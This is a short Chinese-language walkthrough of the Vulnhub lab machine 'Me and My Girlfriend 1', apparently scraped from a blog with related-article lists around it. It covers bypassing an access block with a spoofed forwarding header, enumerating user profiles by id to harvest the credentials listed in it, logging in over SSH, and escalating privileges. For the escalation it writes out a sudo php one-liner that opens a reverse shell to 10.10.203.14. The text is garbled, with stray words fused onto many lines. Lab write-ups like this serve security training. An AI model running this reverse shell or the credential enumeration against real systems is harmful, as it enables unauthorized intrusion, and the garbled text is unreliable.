Girlfreind:1 Vulnhub Walkthrough
靶机连接:php
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/web
主机扫描:ssh
HTTP 目录访问,提示无权限,右键源码,提示XXF便可3d
正常访问,注册一个用户,登陆,而后查看用户profile,经过id进行遍历枚举用户密码blog
eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty!!!
abdikasepak dorrrrr
sundatea indONEsia
alice 4lic3
pentest pentest源码
经过注意登陆web,无发现上传的点test
而后经过ssh尝试登陆登录
提权操做sed
sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'date
OVER !!
相关文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough
- 更多相关文章...
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough